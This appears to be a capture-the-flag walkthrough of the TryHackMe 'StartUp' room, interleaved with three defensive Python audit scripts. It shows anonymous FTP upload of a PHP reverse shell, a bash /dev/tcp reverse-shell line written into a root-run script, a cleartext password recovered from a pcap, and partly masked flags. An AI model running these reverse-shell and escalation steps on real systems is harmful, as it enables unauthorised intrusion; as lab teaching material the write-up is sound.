StartUp
Room Covers:
Discovery
Exploitation
Privilege Escalation (horizontal + vertical)
Target Details
IP: 10.10.115.38
Service and Content Discovery
Scan Machine with Nmap
nmap -sC -sV -Pn -oN nmap.txt 10.10.115.38

Nmap scan report for 10.10.115.38
Host is up (0.38s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
21/tcp   open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp [NSE: writeable]
| -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
|_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.x.x.x
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
|   256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_  256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Maintenance
|_http-server-header: Apache/2.4.18 (Ubuntu)
1131/tcp filtered caspssl
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 2 13:34:28 2022 -- 1 IP address (1 host up) scanned in 64.99 seconds
We can log in anonymously to FTP, and the ftp directory is writable by the anonymous user.

Services Discovered

Service   Port   Version
FTP       21     vsftpd 3.0.3
SSH       22     OpenSSH 7.2p2
HTTP      80     Apache httpd 2.4.18
Visiting the HTTP site doesn't provide much information.
Finding directories using gobuster
gobuster dir -u http://10.10.115.38 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 30 --no-error -o web-dirs.txt
Directories Found

Directory   Link
files       /files

On visiting /files we get a few files along with the notice directory.
Accessing FTP
Login anonymously
ftp 10.10.115.38
Connected to 10.10.115.38.
220 (vsFTPd 3.0.3)
Name (10.10.115.38:attacker): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Logged in successfully
List files:

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Jul 02 09:09 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
These are the same files that the web server exposes under the /files directory.
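The foothold here is a chain of three server-side settings rather than a single bug: anonymous login is allowed, the anonymous user may upload, and the FTP root sits inside Apache's document root, so any upload becomes reachable over HTTP. The Python below is an added example, not part of this writeup or of vsftpd, that audits a vsftpd.conf for that chain. Both configuration texts are constructed, and the /var/www/html web root and the /srv/ftp fallback for an unset anon_root are assumptions.

```python
# Added example (not from the room or the vsftpd project): audit a vsftpd-style
# configuration for the pattern behind this foothold, anonymous login plus
# anonymous upload into a directory that the web server also serves.
from pathlib import PurePosixPath

# Constructed sample configs; NOT the box's real /etc/vsftpd.conf.
WEAK_CONF = """
listen=YES
anonymous_enable=YES
local_enable=NO
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
anon_root=/var/www/html/files
"""

HARDENED_CONF = """
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
local_root=/srv/ftp
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""


def parse_vsftpd(text):
    """Return {directive: value} from key=value lines; comments and blanks are skipped."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip().lower()] = value.strip()
    return conf


def is_yes(conf, key, default="NO"):
    return conf.get(key, default).upper() == "YES"


def under(path, root):
    """True if path equals root or lies inside it (pure path logic, no filesystem access)."""
    p, r = PurePosixPath(path), PurePosixPath(root)
    return p == r or r in p.parents


def audit(conf_text, web_roots=("/var/www/html",)):
    """Return a list of finding strings; an empty list means nothing was flagged."""
    conf = parse_vsftpd(conf_text)
    findings = []
    # vsftpd's compiled-in default for anonymous_enable is YES, so a missing
    # directive is treated as enabled.
    if is_yes(conf, "anonymous_enable", default="YES"):
        findings.append("anonymous_enable=YES: unauthenticated logins permitted")
        if is_yes(conf, "write_enable") and is_yes(conf, "anon_upload_enable"):
            findings.append("anonymous users may upload files (write_enable + anon_upload_enable)")
        if is_yes(conf, "anon_mkdir_write_enable"):
            findings.append("anonymous users may create directories (anon_mkdir_write_enable)")
        # Assumption: when anon_root is unset, the ftp user's home is /srv/ftp (Ubuntu layout).
        anon_root = conf.get("anon_root", "/srv/ftp")
        for web_root in web_roots:
            if under(anon_root, web_root):
                findings.append(
                    f"anonymous root {anon_root} lies inside web root {web_root}: "
                    "anything uploaded becomes reachable over HTTP"
                )
    if not is_yes(conf, "ssl_enable"):
        findings.append("ssl_enable=NO: logins and data cross the network in cleartext")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for finding in audit(text) or ["no findings"]:
            print("  -", finding)
```

Run it on a real host by passing the contents of /etc/vsftpd.conf to audit() together with the DocumentRoot values from the Apache configuration; the web-root overlap check is the one that turns "anonymous upload" from a data-hygiene issue into remote code execution.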
Get Reverse Shell from Target Machine
Download php reverse shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
In the reverse shell script, change the IP to the TryHackMe VPN IP; the default port is 1234.
Start Netcat listener
nc -nlvp 1234
Upload via FTP anonymously
ftp> cd ftp
250 Directory successfully changed.
ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5596 bytes sent in 0.00 secs (53.3676 MB/s)
ftp>
From the browser, visit the /files/ftp/ directory and click on the reverse shell file to get a reverse shell on the attacker's terminal:

# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.115.38] 51642
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 08:15:07 up 13 min,  0 users,  load average: 0.07, 0.51, 0.44
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Search for First Flag
Find files
$ whoami
www-data
$ ls
bin  boot  dev  etc  home  incidents  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  recipe.txt  root  run  sbin  snap  srv  sys  tmp  usr  vagrant  var  vmlinuz  vmlinuz.old
Read the recipe.txt file:

$ cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was xxxx.
We need to escalate privileges to read files
Privilege Escalation
Finding files with the SUID bit set
$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping6
/bin/su
/bin/ping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/at
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
Nothing useful stands out in this list.
Checking for Python to get shell with tty
$ python --version Python 2.7.12
Spawn TTY terminal to use sudo/su
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@startup
In the /incidents directory we find a pcap file:

www-data@startup:/incidents$ ls -l
total 32
-rwxr-xr-x 1 www-data www-data 31224 Nov 12  2020 suspicious.pcapng
To analyze this file in Wireshark we first need to download it. Let's copy it into the ftp directory, from where we can fetch it via the web server:

www-data@startup:/incidents$ cp suspicious.pcapng /var/www/html/files/ftp
Download the file from
http://10.10.115.38/files/ftp/suspicious.pcapng
Load the file in Wireshark, right-click on a TCP packet numbered around 200 and choose Follow -> TCP Stream. A list of commands pops up in a new window, where we can find the password.
From the pcap file (using Follow TCP Stream), lennie's password:
c4ntg3txxxxxxxxxxx
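Follow TCP Stream worked here for the same reason a network sensor can catch this in production: FTP sends USER and PASS on the control channel in the clear, and the box's own nmap output already said "Control connection is plain text". The Python below is an added example, not from the room, that reassembles FTP control sessions from packet records and reports cleartext, anonymous and TLS-protected logins. The packet records are constructed rather than taken from suspicious.pcapng, and any password seen is stored only as a masked hint so the detection log does not become a second credential leak.

```python
# Added example (not from the room): reassemble FTP control sessions from packet
# records and flag logins whose credentials crossed the wire in cleartext, which
# is exactly what Follow -> TCP Stream exposed in suspicious.pcapng above.
from collections import defaultdict

FTP_PORT = 21

# Constructed packet records (src, sport, dst, dport, payload); these are NOT
# taken from the box's suspicious.pcapng.
PACKETS = [
    # session 1: plaintext login, the weakness this room relies on
    ("10.0.0.5", 40001, "10.0.0.9", 21, b"USER lennie\r\n"),
    ("10.0.0.9", 21, "10.0.0.5", 40001, b"331 Please specify the password.\r\n"),
    ("10.0.0.5", 40001, "10.0.0.9", 21, b"PASS hunter2-constructed\r\n"),
    ("10.0.0.9", 21, "10.0.0.5", 40001, b"230 Login successful.\r\n"),
    # session 2: AUTH TLS before login, so the credentials are encrypted
    ("10.0.0.7", 40002, "10.0.0.9", 21, b"AUTH TLS\r\n"),
    ("10.0.0.9", 21, "10.0.0.7", 40002, b"234 Proceed with negotiation.\r\n"),
    ("10.0.0.7", 40002, "10.0.0.9", 21, b"\x16\x03\x03\x00\x31\x01\x00\x00\x2d"),  # TLS ClientHello prefix
    # session 3: anonymous login; no secret is leaked but it is worth reporting
    ("10.0.0.8", 40003, "10.0.0.9", 21, b"USER anonymous\r\nPASS guest@\r\n"),
    ("10.0.0.9", 21, "10.0.0.8", 40003, b"230 Login successful.\r\n"),
]


def reassemble(packets):
    """Group payloads per client<->server pair, in capture order, like Follow TCP Stream."""
    streams = defaultdict(list)
    for src, sport, dst, dport, payload in packets:
        if dport == FTP_PORT:
            key, who = (src, sport, dst, dport), "client"
        elif sport == FTP_PORT:
            key, who = (dst, dport, src, sport), "server"
        else:
            continue  # not FTP control traffic
        streams[key].append((who, payload))
    return streams


def analyse_stream(events):
    """Walk one control session and record what an observer on the wire could read."""
    state = {"user": None, "cleartext_password": False, "password_hint": None,
             "tls": False, "login_ok": False}
    for who, payload in events:
        if state["tls"]:
            break  # once the server answered 234, everything after is TLS ciphertext
        try:
            text = payload.decode("ascii")
        except UnicodeDecodeError:
            continue  # non-ASCII bytes on a plaintext channel; nothing to parse
        for line in text.split("\r\n"):
            if not line:
                continue
            if who == "server":
                code = line[:3]
                if code == "230":
                    state["login_ok"] = True
                elif code == "234":
                    state["tls"] = True
                continue
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                state["user"] = arg.strip().lower()
            elif verb == "PASS":
                # Keep only a masked hint: the alert must not re-leak the secret.
                state["cleartext_password"] = True
                state["password_hint"] = arg[:2] + "*" * max(len(arg) - 2, 0)
    return state


def report(packets):
    """One finding per FTP control session."""
    findings = []
    for (client, _, server, _), events in reassemble(packets).items():
        s = analyse_stream(events)
        if s["tls"]:
            verdict = "encrypted (AUTH TLS negotiated before login)"
        elif s["user"] in ("anonymous", "ftp"):
            verdict = "anonymous login"
        elif s["cleartext_password"]:
            verdict = f"cleartext password for user {s['user']} (hint {s['password_hint']})"
        else:
            verdict = "no credentials observed"
        findings.append({"client": client, "server": server, "user": s["user"],
                         "login_ok": s["login_ok"], "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in report(PACKETS):
        print(f"{f['client']} -> {f['server']}: {f['verdict']} (login ok: {f['login_ok']})")
```

To run this against a real capture, feed it (src, sport, dst, dport, payload) tuples extracted by any pcap reader; the session logic itself is independent of the capture format. The "encrypted" verdict for a session that negotiated AUTH TLS before USER is the behaviour the fix on the server side (ssl_enable with forced SSL logins) should produce for every session.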
Now, we can log into lennie's account with the password
su lennie
Password:
lennie@startup:~$
We've successfully escalated privileges horizontally.
Get User Flag
Finding Flag
lennie@startup:~$ ls Documents scripts user.txt
Read the user.txt file:

lennie@startup:~$ cat user.txt
THM{03ce3d619b80ccxxxxxxxxxxxxxxxxxx}
Escalating Privileges Vertically
Finding executables with the SUID bit set
lennie@startup:~$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping6
/bin/su
/bin/ping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/at
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
Let's try sudo.
List the commands lennie may run with sudo:

lennie@startup:~$ sudo -l
[sudo] password for lennie: c4ntg3t3n0ughsp1c3
Sorry, user lennie may not run sudo on startup.
We cannot use the sudo command. There was a scripts folder in the home directory:

lennie@startup:~$ ls -l scripts
total 8
-rwxr-xr-x 1 root root 77 Nov 12  2020 planner.sh
-rw-r--r-- 1 root root  1 Jul  2 10:42 startup_list.txt
The planner.sh script belongs to the root user. Read the planner.sh script:

lennie@startup:~$ cat scripts/planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
The script calls another script, /etc/print.sh, with root privileges. Let's analyze the print.sh script:

lennie@startup:~$ ls -l /etc/print.sh
-rwx------ 1 lennie lennie 60 Jul  2 10:11 /etc/print.sh
This script belongs to lennie, so we can write to it and turn it into a reverse shell that runs with root access.
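What makes this step possible is a root-executed script that depends on a file owned by a non-root user: whoever owns /etc/print.sh decides what root runs. The Python below is an added example, not code from the room, that audits a root-run script for exactly this kind of dependency and also flags a root-owned file living in a user-owned directory (the startup_list.txt case). The ownership table is constructed to mirror the box, uid 1000 stands in for lennie (an assumption), and the fixed planner.sh and its /var/lib/startup state directory are hypothetical.

```python
# Added example (not from the room): audit a script that runs as root for
# dependencies that a less-privileged user can modify, the weakness behind
# planner.sh calling a lennie-owned /etc/print.sh. The file table is constructed
# to mirror the box; uid 1000 stands in for lennie (an assumption).
import os
import posixpath
import re
import stat

# Constructed ownership/mode table: path -> (owner uid, permission bits).
BOX_FS = {
    "/home/lennie/scripts":                  (1000, 0o755),
    "/home/lennie/scripts/planner.sh":       (0, 0o755),
    "/home/lennie/scripts/startup_list.txt": (0, 0o644),
    "/etc":                                  (0, 0o755),
    "/etc/print.sh":                         (1000, 0o700),
}
# Same box after the (hypothetical) fix: print.sh owned by root and not writable
# by others, state file moved into a root-owned directory.
FIXED_FS = {
    "/etc":                                  (0, 0o755),
    "/etc/print.sh":                         (0, 0o755),
    "/var/lib/startup":                      (0, 0o755),
    "/var/lib/startup/startup_list.txt":     (0, 0o644),
}

# planner.sh as shown on the page, and a hardened rewrite (hypothetical).
PLANNER_SH = "#!/bin/bash\necho $LIST > /home/lennie/scripts/startup_list.txt\n/etc/print.sh\n"
PLANNER_FIXED = '#!/bin/bash\necho "$LIST" > /var/lib/startup/startup_list.txt\n/etc/print.sh\n'

# Crude lexical scan for absolute paths; variables, globs and relative paths are not resolved.
PATH_RE = re.compile(r"(?<![\w.])/[\w./-]+")


def table_lookup(table):
    """Lookup function over a constructed table, returning (uid, mode) or None."""
    return lambda path: table.get(path)


def os_lookup(path):
    """Real-filesystem adapter with the same contract, for use on a live host."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, stat.S_IMODE(st.st_mode)


def referenced_paths(script_text):
    return sorted(set(PATH_RE.findall(script_text)))


def audit_root_script(script_text, lookup, trusted_uids=(0,)):
    """Flag every referenced path that someone outside trusted_uids could alter or replace."""
    findings = []
    for path in referenced_paths(script_text):
        info = lookup(path)
        if info is None:
            continue  # not in the table (or not yet created on a live host); nothing to judge
        uid, mode = info
        if uid not in trusted_uids:
            findings.append(f"{path}: owned by uid {uid}, who can rewrite what root runs")
        if mode & 0o022:
            findings.append(f"{path}: group/world writable (mode {oct(mode)})")
        parent = posixpath.dirname(path)
        pinfo = lookup(parent)
        if pinfo is not None and pinfo[0] not in trusted_uids:
            findings.append(f"{parent}: directory owned by uid {pinfo[0]}, so {path} can be replaced or symlinked")
    return findings


if __name__ == "__main__":
    for label, script, table in (("as found", PLANNER_SH, BOX_FS), ("fixed", PLANNER_FIXED, FIXED_FS)):
        print(f"[{label}]")
        for finding in audit_root_script(script, table_lookup(table)) or ["no findings"]:
            print("  -", finding)
```

On a live host, call audit_root_script(open(path).read(), os_lookup) for each script that cron, systemd or sudoers runs as root; the two findings the box produces (a user-owned script invoked by root, and root writing into a user-owned directory) are the ones an administrator would need to close before the planner job is safe.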
Overwrite file contents
echo "bash -c 'exec sudo bash -i &>/dev/tcp/10.x.x.x/9999 <&1'" > /etc/print.sh
Start netcat listener on attacker's machine on port 9999
nc -nlvp 9999 listening on [any] 9999 ...
Execute the planner.sh script:

bash /home/lennie/scripts/planner.sh
Get Reverse Shell
nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.115.38] 50290
sudo: unable to resolve host startup
bash: cannot set terminal process group (5564): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~#
We've successfully obtained root privileges on the machine.
Get Root Flag
List files:

root@startup:~# ls
root.txt

Read the root.txt file:

root@startup:~# cat root.txt
THM{f963aaa6a43xxxxxxxxxxxxxxxxxxxxx}